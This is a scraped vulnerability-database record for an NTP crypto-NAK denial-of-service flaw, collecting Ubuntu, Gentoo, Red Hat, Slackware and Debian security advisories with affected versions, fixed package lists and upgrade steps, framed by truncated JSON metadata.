0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ISC BIND named Input validation vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201509-057" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation", "sources": [ { "db": "CNNVD", "id": "CNNVD-201509-057" } ], "trust": 0.6 } }
var-201701-1138
Vulnerability from variot
An off-path attacker can cause a preemptible client association to be demobilized in NTP 4.2.8p4 and earlier and NTPSec a5fb34b9cc89b92a8fef2f459004865c93bb7f92 by sending a crypto NAK packet to a victim client with a spoofed source address of an existing associated peer. This is true even if authentication is enabled. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Versions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ========================================================================== Ubuntu Security Notice USN-3096-1 October 05, 2016
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in NTP. A remote attacker could use this issue to perform a replay attack. (CVE-2015-7973)
Matt Street discovered that NTP incorrectly verified peer associations of symmetric keys. A remote attacker could use this issue to perform an impersonation attack. (CVE-2015-7974)
Jonathan Gardner discovered that the NTP ntpq utility incorrectly handled memory. This issue only affected Ubuntu 16.04 LTS. (CVE-2015-7975)
Jonathan Gardner discovered that the NTP ntpq utility incorrectly handled dangerous characters in filenames. An attacker could possibly use this issue to overwrite arbitrary files. (CVE-2015-7976)
Stephen Gray discovered that NTP incorrectly handled large restrict lists. (CVE-2015-7977, CVE-2015-7978)
Aanchal Malhotra discovered that NTP incorrectly handled authenticated broadcast mode. (CVE-2015-7979)
Jonathan Gardner discovered that NTP incorrectly handled origin timestamp checks. A remote attacker could use this issue to spoof peer servers. (CVE-2015-8138)
Jonathan Gardner discovered that the NTP ntpq utility did not properly handle certain incorrect values. (CVE-2015-8158)
It was discovered that the NTP cronjob incorrectly cleaned up the statistics directory. A local attacker could possibly use this to escalate privileges. (CVE-2016-0727)
Stephen Gray and Matthew Van Gundy discovered that NTP incorrectly validated crypto-NAKs. A remote attacker could possibly use this issue to prevent clients from synchronizing. A remote attacker could possibly use this issue to prevent clients from synchronizing. (CVE-2016-1548)
Matthew Van Gundy, Stephen Gray and Loganaden Velvindron discovered that NTP incorrectly handled message authentication. (CVE-2016-1550)
Yihan Lian discovered that NTP incorrectly handled duplicate IPs on unconfig directives. (CVE-2016-4956)
In the default installation, attackers would be isolated by the NTP AppArmor profile.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: ntp 1:4.2.8p4+dfsg-3ubuntu5.3
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.10
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.11
In general, a standard system update will make all the necessary changes. 6.7) - i386, noarch, ppc64, s390x, x86_64
Gentoo Linux Security Advisory GLSA 201607-15
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"
References
[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-15
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ntp security update Advisory ID: RHSA-2016:1141-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2016:1141 Issue date: 2016-05-31 CVE Names: CVE-2015-7979 CVE-2016-1547 CVE-2016-1548 CVE-2016-1550 CVE-2016-2518 =====================================================================
- Summary:
An update for ntp is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.
Security Fix(es):
-
It was found that when NTP was configured in broadcast mode, a remote attacker could broadcast packets with bad authentication to all clients. The clients, upon receiving the malformed packets, would break the association with the broadcast server, causing them to become out of sync over a longer period of time. (CVE-2015-7979)
-
A denial of service flaw was found in the way NTP handled preemptable client associations. (CVE-2016-1547)
-
It was found that an ntpd client could be forced to change from basic client/server mode to the interleaved symmetric mode. (CVE-2016-1548)
-
A flaw was found in the way NTP's libntp performed message authentication. An attacker able to observe the timing of the comparison function used in packet authentication could potentially use this flaw to recover the message digest. (CVE-2016-1550)
-
An out-of-bounds access flaw was found in the way ntpd processed certain packets. An authenticated attacker could use a crafted packet to create a peer association with hmode of 7 and larger, which could potentially (although highly unlikely) cause ntpd to crash. (CVE-2016-2518)
The CVE-2016-1548 issue was discovered by Miroslav Lichvar (Red Hat).
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1300271 - CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode 1331461 - CVE-2016-1547 ntp: crypto-NAK preemptable association denial of service 1331462 - CVE-2016-1548 ntp: ntpd switching to interleaved mode with spoofed packets 1331464 - CVE-2016-1550 ntp: libntp message digest disclosure 1331468 - CVE-2016-2518 ntp: out-of-bounds references on crafted packet
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
i386: ntp-4.2.6p5-10.el6.1.i686.rpm ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntpdate-4.2.6p5-10.el6.1.i686.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntp-perl-4.2.6p5-10.el6.1.i686.rpm
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
i386: ntp-4.2.6p5-10.el6.1.i686.rpm ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntpdate-4.2.6p5-10.el6.1.i686.rpm
ppc64: ntp-4.2.6p5-10.el6.1.ppc64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm ntpdate-4.2.6p5-10.el6.1.ppc64.rpm
s390x: ntp-4.2.6p5-10.el6.1.s390x.rpm ntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm ntpdate-4.2.6p5-10.el6.1.s390x.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntp-perl-4.2.6p5-10.el6.1.i686.rpm
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm ntp-perl-4.2.6p5-10.el6.1.ppc64.rpm
s390x: ntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm ntp-perl-4.2.6p5-10.el6.1.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
i386: ntp-4.2.6p5-10.el6.1.i686.rpm ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntpdate-4.2.6p5-10.el6.1.i686.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntp-perl-4.2.6p5-10.el6.1.i686.rpm
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
ppc64: ntp-4.2.6p5-22.el7_2.2.ppc64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm ntpdate-4.2.6p5-22.el7_2.2.ppc64.rpm
ppc64le: ntp-4.2.6p5-22.el7_2.2.ppc64le.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm ntpdate-4.2.6p5-22.el7_2.2.ppc64le.rpm
s390x: ntp-4.2.6p5-22.el7_2.2.s390x.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm ntpdate-4.2.6p5-22.el7_2.2.s390x.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm sntp-4.2.6p5-22.el7_2.2.ppc64.rpm
ppc64le: ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm sntp-4.2.6p5-22.el7_2.2.ppc64le.rpm
s390x: ntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm sntp-4.2.6p5-22.el7_2.2.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-7979 https://access.redhat.com/security/cve/CVE-2016-1547 https://access.redhat.com/security/cve/CVE-2016-1548 https://access.redhat.com/security/cve/CVE-2016-1550 https://access.redhat.com/security/cve/CVE-2016-2518 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXTUp2XlSAg2UNWIIRAqUmAKC32P98McZUqU1gzWxBbCz0hn0eagCfRtrx SULnKXrtTJd5iJ6eQVtDnxA= =hETy -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. This release patches several low and medium severity security issues: CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering CVE-2016-1549: Sybil vulnerability: ephemeral association attack, AKA: ntp-sybil - MITIGATION ONLY CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion botch CVE-2016-2517: Remote configuration trustedkey/requestkey values are not properly validated CVE-2016-2518: Crafted addpeer with hmode > 7 causes array wraparound with MATCH_ASSOC CVE-2016-2519: ctl_getitem() return value not always checked CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos CVE-2016-1548: Interleave-pivot - MITIGATION ONLY CVE-2015-7704: KoD fix: peer associations were broken by the fix for NtpBug2901, AKA: Symmetric active/passive mode is broken CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks CVE-2016-1550: Improve NTP security against buffer comparison timing attacks, authdecrypt-timing, AKA: authdecrypt-timing For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz
Slackware 13.1 package: dfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz
Slackware 13.37 package: e760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: aa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz
Slackware 14.0 package: 3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz
Slackware 14.1 package: dbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz
Slackware -current package: 4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz
Slackware x86_64 -current package: 7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
CVE-2015-7977 / CVE-2015-7978
Stephen Gray discovered that a NULL pointer dereference and a
buffer overflow in the handling of "ntpdc reslist" commands may
result in denial of service.
CVE-2016-2518
Yihan Lian discovered that an OOB memory access could potentially
crash ntpd.
For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u2.
For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p7+dfsg-1.
For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p7+dfsg-1.
We recommend that you upgrade your ntp packages
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201701-1138", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "lte", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "eq", "trust": 0.9, "vendor": "ntp", "version": "4.2.8" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "lte", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p4 and earlier" }, { "model": "ntp", "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, 